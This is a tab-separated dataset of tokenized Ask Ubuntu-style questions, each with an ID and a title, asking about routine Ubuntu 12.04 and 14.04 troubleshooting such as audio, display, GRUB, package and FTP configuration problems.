482740	how to close rhythmbox	do not laugh me i know where is close button ! ! ! ! ! ! ! ! ! but when i open mp3 file by rythmbox , when i want to close that by clicking the close button . the window disappear , but the music is still playing , so always i have to close that via system monitor . how to close that ? i have 14.04
482749	how to convert all footnotes to endnotes in libreoffice writer	could somebody advice how i can convert my footnotes in libreoffice to endnotes . i have them few hundred , and i want to keep my continuous numbering . in libreoffice i know how to convert them , but it does not keep my numbering , and it devides the notes to several sections.i foun in google that microsofoffice converts them , but i did not find it in libre- or openoffice . also microsoft word did not do that in my 2007 version .
482751	how to stop unity love handles on onscreen keybord	i have a dell xps12 - the one that converts into a tablet . when typing with onboard [ default onscreen keyboard ] , sometimes 3 fingers will be touching the screen at the same time . this launches the love handles which then stuff up the typing . i really do love the 3 finger move and resize stuff though , is there a way to disable this just for the one program ? i ca n't seem to find anything for this in ccsm - but maybe i just missed it . any help would be appreciated : ) thanks !
482754	proftpd : login failled with 530 error	i 'm using gadmin-proftpd to manage a local proftpd server . on the main server , there is a virtual user `` test2 '' with a password , allowed to access a directory in my home directory ( /home/erwan/ftp/test2 ) . but when i 'm trying to connect to the ftp server , i 'm getting refused with a 530 error ( either if the password is right or wrong ) . here is my configuration file : servertype standalone defaultserver on umask 022 servername `` 0.0.0.0 '' serverident on `` my ftp server '' serveradmin egeorget @ openmailbox.org identlookups off usereversedns off port 2586 passiveports 49152 65534 # masqueradeaddress none timesgmt on maxinstances 100 maxloginattempts 5 timeoutlogin 300 timeoutnotransfer 300 timeoutidle 300 displaylogin welcome.msg displaychdir .message user erwan group nogroup dirfakeuser off nobody dirfakegroup off nobody defaulttransfermode binary allowforeignaddress off allowretrieverestart on allowstorerestart on deleteabortedstores off transferrate retr 220 transferrate stor 250 transferrate stou 250 transferrate appe 250 systemlog /var/log/secure requirevalidshell off < ifmodule mod_tls.c > tlsengine off tlsrequired off tlsverifyclient off tlsprotocol sslv23 tlslog /var/log/proftpd_tls.log tlsrsacertificatefile /etc/gadmin-proftpd/certs/cert.pem tlsrsacertificatekeyfile /etc/gadmin-proftpd/certs/key.pem tlscacertificatefile /etc/gadmin-proftpd/certs/cacert.pem tlsrenegotiate required off tlsoptions allowclientrenegotiation < /ifmodule > < ifmodule mod_ratio.c > ratios off saveratios off ratiofile `` /restricted/proftpd_ratios '' ratiotempfile `` /restricted/proftpd_ratios_temp '' cwdratiomsg `` please upload first ! '' fileratioerrmsg `` fileratio limit exceeded , upload something first ... '' byteratioerrmsg `` byteratio limit exceeded , upload something first ... '' leechratiomsg `` your ratio is unlimited . '' < /ifmodule > < limit login > allowuser test denyall < /limit > < anonymous /home/erwan/ftp/test > user test group testgroup1 anonrequirepassword on maxclients 10 `` the server is full , hosting % m users '' displaylogin welcome.msg displaychdir .msg < limit login > allow from all deny from all < /limit > allowoverwrite on < limit list nlst stor stou appe retr rnfr rnto dele mkd xmkd site_mkdir rmd xrmd site_rmdir site site_chmod site_chgrp mtdm pwd xpwd size stat cwd xcwd cdup xcup > allowall < /limit > < limit nothing > denyall < /limit > < /anonymous >
482755	when should a fresh install should be made	on my desktop at home , a 2008 vaio w/4gb ram and dual core processor running 12.04 lts , i 've been experiencing of late a perceived performance degradation . it 's most apparent at startup but it 's also noticeable when working with/on ( js , mainly ) the browser ( especially , chrome but also firefox ) . my system is up to date but it includes ( for sure ) thousands of programs which are not used very often . i 've read a thread about this issue but it looked pretty old and it did n't address the lts vs normal distro stuff . so , my questions are : does an installation ( and i mean a lts one , of course ) gradually degrades its performance over time even when it 's regularly updated ? if so , why ? is there any actual difference between a clean install and an upgrade in the case of a lts distro ? if so , how would installing ( lots of ) new software after the system is working could affect its preformance ? how to recognise the signs showing that it might well be the time to invest on a new computer ? thanks in advance , nacho p.s . in case of carrying out a clean installation , is there any way of ending up with basically the same software base you had before ?
482756	why is my calendar missing the display icon ?	currently using ubuntu 14.04 and when i click on the date/time and open the calendar at the top of the windows where it displays dat and date to the left of this there is a random icon with a red cross on it . it looks like it is missing the icon . is there a way to correct this , apologies as i cant post my screenshot .
482766	how do i know my fan is working in ubuntu	i just bought a brand new netbook and am worried the fan is n't working properly . lm-sensors does not detect a fan , i ca n't hear a fan , and ca n't feel air blowing out of the fan area . the netbook is a brand new toshiba satellite nb10-a . i 'm worried that using ubuntu will destroy my netbook . : ( the temperature continues to get hotter , but i ca n't hear a fan . here is my lm-sensors output : acpitz-virtual-0 adapter : virtual device temp1 : +33.0°c ( crit = +78.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +48.0°c ( high = +105.0°c , crit = +105.0°c ) core 1 : +48.0°c ( high = +105.0°c , crit = +105.0°c ) edit another reviewer of this exact model expressed concern over the fan not working as he could n't detect a fan nor hear the fan : http : //mentalnirex.wordpress.com/2014/03/25/linux-and-the-toshiba-nb10/ output from fwts fan : results generated by fwts : version v14.03.01 ( 2014-03-27 02:14:17 ) . some of this work - copyright ( c ) 1999 - 2014 , intel corp. all rights reserved . some of this work - copyright ( c ) 2010 - 2014 , canonical . this test run on 14/06/14 at 12:45:01 on host linux juke 3.15.0-031500rc8-generic # 201406012235 smp mon jun 2 02:36:11 utc 2014 x86_64 . command : `` fwts fan '' . running tests : fan . fan : simple fan tests . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- test 1 of 2 : test fan status . test how many fans there are in the system . check for the current status of the fan ( s ) . passed : test 1 , fan cooling_device0 of type processor has max cooling state 10 and current cooling state 0 . passed : test 1 , fan cooling_device1 of type processor has max cooling state 10 and current cooling state 0 . test 2 of 2 : load system , check cpu fan status . test how many fans there are in the system . check for the current status of the fan ( s ) . loading cpus for 20 seconds to try and get fan speeds to change . fan cooling_device0 current state did not change from value 0 while cpus were busy . fan cooling_device1 current state did not change from value 0 while cpus were busy . advice : did not detect any change in the cpu related thermal cooling device states . it could be that the devices are returning static information back to the driver and/or the fan speed is automatically being controlled by firmware using system management mode in which case the kernel interfaces being examined may not work anyway . ================================================================================ 2 passed , 0 failed , 0 warning , 0 aborted , 0 skipped , 0 info only . ================================================================================ 2 passed , 0 failed , 0 warning , 0 aborted , 0 skipped , 0 info only . test failure summary ================================================================================ critical failures : none high failures : none medium failures : none low failures : none other failures : none test |pass |fail |abort|warn |skip |info | -- -- -- -- -- -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ fan | 2| | | | | | -- -- -- -- -- -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ total : | 2| 0| 0| 0| 0| 0| -- -- -- -- -- -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+
482767	can someone help me to understand sar output ?	how do i find which disk is performing slow using sar command ? . i did n't understand anything from that . output is : 05:52:27 ist runq-sz plist-sz ldavg-1 ldavg-5 ldavg-15 blocked 05:52:28 ist 0 256 0.20 0.70 0.86 0
482768	changing windows dynamic disk partition to basic partition and not the full drive	i have a lenovo g505s with win8 installed on it . i would like to install ubuntu 14.04 on it , i followed all the procedures to disable the secure boot and fast boot succefully . the problem starts here : once the installation starts , gparted does n't recognize the dynamic partitions of hdd . it shows the whole hdd as unknown field . i want to convert my hdd partition , which i made for ubuntu , to a basic partition . without changing the other partitions . is this possible to just change a single partition to basic from dynamic , without having to change the whole hard-disk ?
482769	when reading a text file , how to get rid of `` \n '' when extracted in python	i am writing a program where you have to extract bits of text from a text file . the specific bit of text is the save directory where i would like to save the files produced by my program . here is my code : file = open ( `` datafile.txt '' , `` r '' ) savedir = file.read ( ) print savedir that seems to be working properly , the output is exactly as it should be , `` /home/marc/quickjotprogram/quickjottexts '' please note that the program skips a line before the end quote which is my problem it 's not a problem until later in the program where i use the savedir variable : text_file = open ( os.path.join ( savedir , title ) , `` w '' ) the error message is : text_file = open ( os.path.join ( savedir , title ) , `` w '' ) ioerror : [ errno 2 ] no such file or directory : '/home/marc/quickjotprogram/quickjottexts\n/file' the only thing that should not be there is the `` \n '' i just need to get rid of that , and the program will run smoothly . thanks ubuntu : )
482770	grub does not see second operating system	i just installed lubuntu 14.04 on a desktop computer . the computer has two hard drives , one of them contains windowsxp and one of them does contain lubuntu . the idea is to have an offline xp and an online lubuntu in dual boot . there are reasons for this , and i know that the support for xp is down . so what happened : i installed lubuntu and was already wondering why it did not offer to replace windows or something . so i manually chose the second hard drive and now i can boot either windows or lubuntu . but since the user of this computer is not a techie , i want him to choose the os by using grub , not the boot manager that comes up when you press f11 at the right time . but when i press shift to force grub to show up , it does not detect windowsxp in any way . i tried to use the grub-customizer , but i have n't seen an option to manually add the entry to windowsxp . how can i offer grub with options to load ubuntu or windowsxp ? some details that may be important : it 's an uefi system , but as far as i can see everything like secureboot etc . is disabled . when i booted from the usb drive , i had two options : usb and uefi . i first trief usb , but it did n't boot , so i chose uefi . when installing , lubuntu did not offer to replace windows . on ubuntu installation i chose to install the bootloader on /dev/sdb . i did it always like this when i did on my old bios computer , and it always worked with two hard drives and everthing ( windows7 , though )
482772	unable to install vlc in ubuntu 14.04	i get this error while trying to install vlc : the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.1.4+git20140611+r54536+19+11~ubuntu14.04.1 ) but it is not going to be installed depends : libxcb-keysyms1 ( > = 0.3.9 ) but it is not going to be installed recommends : vlc-plugin-notify ( = 2.1.4+git20140611+r54536+19+11~ubuntu14.04.1 ) but it is not going to be installed recommends : vlc-plugin-pulse ( = 2.1.4+git20140611+r54536+19+11~ubuntu14.04.1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages .
482775	how can i configure my usb sound card with kde tools ?	i have a usb soundcard which is detected by the system ( as output in /proc/asound/cards and by lsusb ) . however , it is not selectable in kde settings . it shows up in the list of sound cards , but is greyed out and unselectable . i wonder how i can make sure this card is selectable when i plug it in .
482783	apt-get -s e : the option « s » in command line [ origin -s ] is unknown	near all is in the title , but 14.04 . i also tried all the 5 equivalent long ( -- ) options found in man with the same error . -u from man also fails the same way . please what is this ? thank you .
482794	in uck not able to install any package using apt-get install command	i have installed uck to make custom ubuntu from 14.04 ( 32 bit ) version but getting error as shown below when trying to install any package . root @ 123-linux : / # apt-get install vlc reading package lists ... done building dependency tree reading state information ... done e : unable to locate package vlc however it is correctly working with apt-get update & & apt-get upgrade command .
482801	xubuntu panel filling screen !	i was messing around with the panel settings on xubuntu and i accidentally pushed it to the largest size and number of rows . my resolution is 1366x786 and so it filled my screen , trapping my windows behind it . i am running xubuntu 14.04 and this persists when i log in . please help !
482802	on using script blockers on firefox ( ubuntu 12.04 )	please let me know if this question is inappropriate here . simply put , how do i get a fully ( setting my expectations too high ? ) functional browsing experience using script blocking add-ons ( no-script/httpseverywhere/etc ) when the internet seems to be running on nested scripts . this seems to be such an easy way to beat script blocking ! only expose script c ( all that i want ! ) if user allows execution of script a , b , d , e , f . case in point - i used a government website to enter some info . everything worked out well after i approved it to execute scripts , except that at the end i got a messed up reply , because said website called random script which is not part of the approved scripts/websites . is there a way to inspect all the linked scripts to prevent post-facto fire-fighting ?
482803	how do i make `less` output colors ?	when i run a program ( for example grep or ls ) without a pager , its output is colored . however when i run it piping its output to less , no colors are shown . for example , this command outputs colored output : grep -r something but this does n't : grep -r something | less why ? how can i see colors through less ?
482805	how can i directly boot into ubuntu touch from my pc ?	as the x86 version of ubuntu touch exists , i like to directly boot into ubuntu touch ( may be from my pen drive ) for testing purposes . does anyone know how to do it ?
482809	how can i make the adobe flashplugin use pulseaudio under kubuntu 14.04 ?	i have trouble getting the sound from firefox to output in an external ( usb ) sound card . i understand there are some issues around getting flash to play sound here from googling the question , but i was unable to find a concrete answer on how i can solve my problem .
482811	ubuntu gnome 14.04 , change resolution on gdm login screen/system wide ?	under ubuntu gnome 14.04 , gnome 3.12 , i 'm running with a different from my maximum resolution . after login , the resolution is set fine , and when i log in after locking the machine , the resolution is fine . after reboot or ask to change user , the resolution changes , making things jump around . i would like to fix that . how can i change the resolution for the initial login screen , or change the resolution system wide ? i have tried combining this , this and this , editing my /etc/gdm/init/default ( also tried /etc/gdm/presession/default ) by inserting xrandr -- output edp1 -- primary -- mode 1920x1080 but that did n't work . it had an effect , but it did n't work . i also tried generating my xorg.conf file and editing that with no avail . i 'm not using a proprietary driver .
482813	chrome memory and cpu footprint	i 've searched the forums for an answer but i could n't find quite the answer i was looking for [ 1 ] , so i thought i it could as well be of interest to more people around here . i carry out a big part of my job on the browser ( or for the browser , if you want to put it that way ) . i tend to use chrome , because it 's got natively many of the newest features that i need ( devtools stuff , mainly but not only ) . btw , i 'm usually running the last available chrome version/build on a desktop vaio with 4gb ram and dual core cpu and ubuntu 12.04 as distro and gnome as window manager . so , i was curious about a ) why does chrome spawn so many threads even opening only three of four tabs and b ) is there any way to allocate more memory to chrome to prevent its performance from degrading ? thanks in advance , nacho ps [ 1 ] i found threads about chrome freezing or running out of memory but not about the reasons for this being so or for avoiding it to happen . pps of course , i could always buy a newer and more capable machine and that is exactly what i 'm trying to evaluate : is this a question of outdated hardware or the problem will keep appearing on any ( decently but not hugely sized ) machine ?
482814	difference between atjobs & atspool directory	when i was working with ubuntu 12.04 at command i noticed that there are two different directories /var/spool/cron/atspool and /var/spool/cron/atjobs . i want to know what is the difference between these two directories . thanks for any help .
482815	cd-drive do n't work after installing ubuntu 14.04 lts	i installed ubuntu 14.04 lts and now my cd-drive is not working although i tried to test it with various cd and dvd 's . how can i fix this problem ? this is the screenshot of disks .
482816	how do i resolve not fully installed package ( python3-setuptools ) ?	i was trying to install python3-setuptools , and when i run $ sudo apt-get install python3-setuptools i get this error : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 6 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up python3-setuptools ( 0.6.34-0ubuntu1 ) ... traceback ( most recent call last ) : file `` /usr/bin/py3compile '' , line 36 , in < module > from debpython import files as dpf file `` /usr/share/python3/debpython/files.py '' , line 25 , in < module > from debpython.pydist import public_dir_re file `` /usr/share/python3/debpython/pydist.py '' , line 28 , in < module > from debpython.tools import memoize file `` /usr/share/python3/debpython/tools.py '' , line 25 , in < module > from datetime import datetime importerror : /usr/bin/datetime.so : undefined symbol : _py_zerostruct dpkg : error processing python3-setuptools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : python3-setuptools e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i tried apt-get clean , apt-get autoclean , apt-get remove python3-setuptools , dpkg -- remove python3-setuptools , apt-get install -f , dpkg -p -- force-remove-reinstreq , dpkg -p -- force-all -- force-remove-reinstreq and dpkg -- purge , but none of them worked . output of sudo dpkg -p -- force-all -- force-remove-reinstreq python3-setuptools ( reading database ... 225309 files and directories currently installed . ) removing python3-setuptools ... traceback ( most recent call last ) : file `` /usr/bin/py3clean '' , line 32 , in < module > from debpython import files as dpf file `` /usr/share/python3/debpython/files.py '' , line 25 , in < module > from debpython.pydist import public_dir_re file `` /usr/share/python3/debpython/pydist.py '' , line 28 , in < module > from debpython.tools import memoize file `` /usr/share/python3/debpython/tools.py '' , line 25 , in < module > from datetime import datetime importerror : /usr/bin/datetime.so : undefined symbol : _py_zerostruct dpkg : error processing python3-setuptools ( -- purge ) : subprocess installed pre-removal script returned error exit status 1 traceback ( most recent call last ) : file `` /usr/bin/py3compile '' , line 36 , in < module > from debpython import files as dpf file `` /usr/share/python3/debpython/files.py '' , line 25 , in < module > from debpython.pydist import public_dir_re file `` /usr/share/python3/debpython/pydist.py '' , line 28 , in < module > from debpython.tools import memoize file `` /usr/share/python3/debpython/tools.py '' , line 25 , in < module > from datetime import datetime importerror : /usr/bin/datetime.so : undefined symbol : _py_zerostruct dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : python3-setuptools
482823	`` merging '' multiple hardrives for ubuntu 14.04 install	i have 3 hardrives inside my laptop 2 of which currently house other opperating systems but have a empty partitions of 8 and 9 gigabye and the third is just 12 gb ( currently not partitioned at all ) . now each of these 3 is to small to be useful to me , however combined they are 29gigs which can easily hold a ubuntu installation , and associated programs . is there a way set up my installation in such a way that it threads these 3 disks as one ? or is there a way by which i can make it default storage of many things into one drive ( downloads and sudo apt-get install for example ) to one drive while keeping ubuntu onto another ?
482825	using setxkbmap for a simple remap ( similar to xmodmap )	i 've faced some issues after remapping keyboard with xmodmap : settings get reset randomly after 2-20 minutes after applying . googled it but no help : something resets them , but all mentions apply to xfce , while i 'm under usual 14.04 ubuntu with unity . i saw phrases like 'use xkb , forget xmodmap ' , but still have no idea how to do that . it 's either classified or very complicated , because amount of info on that is significantly smaller than for xmodmap way . here 's my list of customisations : xmodmap -e `` keycode 84 = down '' xmodmap -e `` keycode 79 = home '' xmodmap -e `` keycode 80 = up '' xmodmap -e `` keycode 83 = left '' xmodmap -e `` keycode 85 = right '' xmodmap -e `` keycode 87 = end '' xmodmap -e `` keycode 90 = insert '' xmodmap -e `` keycode 91 = delete '' xmodmap -e `` keycode 89 = next '' xmodmap -e `` keycode 81 = prior '' where keycodes are corresponding keys on numpad , with numlock = off ( basically , i 'm replacing kp_del with delete , kp_home with home etc - do n't ask why ) ) can someone help to find a way to do that using xkb - at least one of the lines ? and where to find the `` names '' of keys for other so i could do the rest by example ?
482828	can ubuntu use all my 4gb of ram ?	i have a dell laptop with 4gb of ram and 500gb of storage.i just finished installing windows 8.1 32bit version , which utilizes 3gb of ram . can i install and run ubuntu to utilize that unusable portion of ram.then how ? thanks in advance
482829	no internet access through bridged wireless connection in virtualbox	i have windows 7 installed in virtualbox on ubuntu 14.04 . this is on a laptop so i have to networking adapters . the ethernet adapter works fine regardless of connection type . wireless only works in nat mode , not bridged which is what i need in order for the vm to have it 's own ip address on the lan . thanks for any help in advance .
482831	mail reaches only after closing connection	i have setup a postfix mail server with saslauthd . i telnet from a windows machine to send a mail . all works fine , i even get the msg 250 mail queued for delivery . on the mailserver i see connect msgs on /var/log/mail.log for connection but not for the mail queuing or delivery . only after i close the telnet connection i get all the valid msgs in mail.log . the mail also doesnt arrive in my maildir/new directory until i close the connection . i am very new to ubuntu , any pointers will be much appreciated . many thanks .
482834	command for checking the default terminal	my situation is : i am trying to make a simple ide for nasm in java . when i execute a .asm file in my ide it open the terminal and shows the output . i am using xterm for this purpose . now the problem is i really do n't like the look of xterm or uxterm . i prefer the gnome-terminal . but if i use the gnome-terminal this will restrict my application to a particular os i.e . it will be able to execute .asm files only in ubuntu ( for eg : the default terminal for kubuntu is something else.. etc.. ) so my idea is that if there is a 'command ' that i can run in xterm to get to know the default terminal and execute the .asm files via my application in the default terminal of the particular os . that was my first question . my second question is : is there a way i can simply transfer the controls of a terminal to something else . like in java to a jtextpane . my idea is to simply create a console like in ecplipse of netbeans where you can see your output in their own console . so it will be actually better than the idea of invoking the terminal and then running the commands in it .
482838	copying kernel and initrd problem while setting up a server	i 'm trying to set up a server using pxe and following this ( clickable ) instruction . but i have a problem in part creating your nfs installation right here : copy kernel and initrd to tftp root . run these commands on the server sudo cp ~/vmlinuz-`uname -r` /tftpboot/ sudo cp ~/initrd.img-`uname -r` /tftpboot/ actually , i do n't know which kernel ( server 's or client 's ) should be copied . there is n't any files like those in my home folder on server . can anybody tell me how to fix it ?
482842	ubuntu getting installed properly but while booting , just showing a blank screen	i tried the fixes suggested as part of other similar problem such as boot repair but still not able to resolve the problem.follwing is the link of boot-repair report http : //paste.ubuntu.com/7639313/ pls help me to fix it.thanks in advance
482843	ubuntu 14.04 two nvidia cards triple screen xinerama with proprietary driver , third screen black and x cursor	i am having some issues getting my third screen working properly . i had triple screens working fine on 12.04 , using 2 nvidia cards . did a fresh install of 14.04 and having no end of problems getting it working . it either will just be disabled , or the screen is black with the cursor as an x. i can only enable it from the nvidia server settings tool . the ubuntu native display settings wo n't even show the 3rd screen . i tried copying the xorg.conf from my old install , which upon restarting x worked fine on the login screen , but then it just sat there after i logged in and didnât do anything ( mouse was still working ) . i am using gnome-session-fallback instead of unity if that makes any difference . still having these issues if i try unity though . how do i get my 3rd screen working and displaying a desktop ? here is my current xorg.conf # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 331.20 ( buildd @ roseapple ) mon feb 3 15:07:22 utc 2014 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` dell 1907fp '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 76.0 option `` dpms '' endsection section `` monitor '' # horizsync source : unknown , vertrefresh source : unknown identifier `` monitor1 '' vendorname `` unknown '' modelname `` dell 1907fp '' horizsync 0.0 - 0.0 vertrefresh 0.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor2 '' vendorname `` unknown '' modelname `` dell 1907fp '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 76.0 endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 580 '' busid `` pci:1:0:0 '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 520 '' busid `` pci:3:0:0 '' endsection section `` device '' identifier `` device2 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 520 '' busid `` pci:3:0:0 '' endsection section `` screen '' # removed option `` metamodes '' `` dvi-i-2 : nvidia-auto-select +0+0 , dvi-i-3 : nvidia-auto-select +1280+0 '' # removed option `` metamodes '' `` dvi-i-2 : nvidia-auto-select +0+0 '' # removed option `` sli '' `` off '' # removed option `` basemosaic '' `` off '' # removed option `` metamodes '' `` gpu-109d4eb8-b40b-87d7-3fd6-95830d1d5215.dvi-i-2 : nvidia-auto-select +0+0 , gpu-109d4eb8-b40b-87d7-3fd6-95830d1d5215.dvi-i-3 : nvidia-auto-select +1280+0 , gpu-82e96214-175e-5e6a-218c-5bdbc948daf2.dvi-i-1 : nvidia-auto-select +3200+0 '' # removed option `` sli '' `` off '' # removed option `` basemosaic '' `` on '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` dvi-i-2 : nvidia-auto-select +0+0 , dvi-i-3 : nvidia-auto-select +1280+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' # removed option `` metamodes '' `` nvidia-auto-select +0+0 '' # removed option `` metamodes '' `` dvi-i-3 : nvidia-auto-select +0+0 '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` metamodes '' `` nvidia-auto-select +0+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen2 '' device `` device2 '' monitor `` monitor2 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` metamodes '' `` nvidia-auto-select +0+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection here is my old 'working in 12.04 ' xorg.conf # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 310.19 ( buildmeister @ swio-display-x86-rhel47-08.nvidia.com ) thu nov 8 02:08:55 pst 2012 section `` serverlayout '' # removed option `` xinerama '' `` 0 '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen2 '' screen 2 `` screen2 '' rightof `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 1 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` dell 1907fp '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 76.0 option `` dpms '' endsection section `` monitor '' # horizsync source : unknown , vertrefresh source : unknown identifier `` monitor1 '' vendorname `` unknown '' modelname `` dell 1907fp '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 76.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor2 '' vendorname `` unknown '' modelname `` apple cinema hd '' horizsync 74.0 - 74.6 vertrefresh 59.9 - 60.0 endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 580 '' busid `` pci:1:0:0 '' screen 0 endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 520 '' busid `` pci:3:0:0 '' endsection section `` device '' identifier `` device2 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 580 '' busid `` pci:1:0:0 '' screen 1 endsection section `` screen '' # removed option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+0 , dfp-2 : nvidia-auto-select +1280+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+0 ; dfp-0 : nvidia-auto-select +0+0 ; dfp-0 : 1280x1024_75 +0+0 ; dfp-0 : 1152x864 +0+0 ; dfp-0 : 1024x768 +0+0 ; dfp-0 : 1024x768_60 +0+0 ; dfp-0 : 800x600 +0+0 ; dfp-0 : 800x600_60 +0+0 ; dfp-0 : 640x480 +0+0 ; dfp-0 : 640x480_60 +0+0 ; dfp-0 : nvidia-auto-select +0+0 { viewportout=1280x720+0+152 } '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` metamodes '' `` nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen2 '' device `` device2 '' monitor `` monitor2 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` metamodes '' `` dfp-2 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` extensions '' option `` composite '' `` disable '' endsection output of xrandr after deleting xorg.conf and rebooting screen 0 : minimum 8 x 8 , current 3200 x 1200 , maximum 16384 x 16384 dvi-i-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-1 disconnected ( normal left inverted right x axis y axis ) dvi-i-2 connected primary 1280x1024+0+0 ( normal left inverted right x axis y axis ) 376mm x 301mm 1280x1024 60.0*+ 75.0 1152x864 75.0 1024x768 75.0 60.0 800x600 75.0 60.3 640x480 75.0 59.9 hdmi-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-3 connected 1920x1200+1280+0 ( normal left inverted right x axis y axis ) 495mm x 310mm 1920x1200 60.0*+ 59.9
482849	why is this zip file unable to open ?	i 'm trying to unzip a zip file which contains a video ... right away it says : 7-zip [ 64 ] 9.20 copyright ( c ) 1999-2010 igor pavlov 2010-11-18 p7zip version 9.20 ( locale=en_us.utf-8 , utf16=on , hugefiles=on,2 cpus ) error : /home/cyberproxy/downloads/floating1a.zip : can not open file as archive errors : 1 unzips on my android , unzips on my windows desktop , unzips on my mother 's ios device with unzipper app . what can i do to fix this ?
482851	get cpu usage of system users	working with monit i need create an alert that get cpu usage of system users , so : top -b -n 1 -u user1 | awk 'nr > 7 { sum += $ 9 ; } end { print sum ; } ' seems a good solution but i 'm not sure about reliable because when i do above command , every time change ( obviously ) the value . so , i need an `` exact '' use of cpu by user within 2-5 seconds , because the value will send like an email alert .
482854	xfce screen goes black after some time	my xfce goes black after some time when i 'm not using computer . i already checked from setting/screensaver that mode is set to be disable screen saver , but the screen still goes black . how can i make sure that i can watch world cup matches without screen going to black ? do i need some script that presses for example shift button every couple of minutes ?
482856	how to open a *.pdf in an already existing instance of okular ( independent of in which workspace that instance resides ) ?	acroread and qpdfview already perform as desired . okular so far does not . all three ( by now already ) support `` tabs '' of multiple pdf files in a single instance of the resp . program . opening a *.pdf via the file 's context menu : open with > okular will add that *.pdf to the already opened instance of okular ( with a different *.pdf already opened within that instance ) , will result in both *.pdf 's being displayed ( as desired ) within the same instance of okular , iff all 's happening / originating from the same workspace else , in a new instance of okular will be opened ( in the other workspace ) . anything i can add to /usr/bin/okular to do the trick ? man okular does n't give any hints to this and also from within okular i see no indicative option in the native settings .
482857	how to install ubuntu from the terminal	i currently use ubuntu 12.10 64bits and would like to upgrade to ubuntu 14 if i run the command sudo apt-get install ubuntu-desktop-14.0 will i upgrade to the latest version ?
482858	how to download any file using runnable terminal directly to my computer	i want to download file from internet by using runnable terminal and i using this command there : wget -o -c `` any_file_address '' and it downloads but i do n't know where is downloading i want to download it to my pc . also i tried by using wget -o -c /home/user/downloads `` any_file_address '' and after downloading i do n't see any downloaded file into folder . thank you for helping . i tried with wget -c -o ~/downloads `` any_file_address '' also . is it possible to download to my own computer or not ?
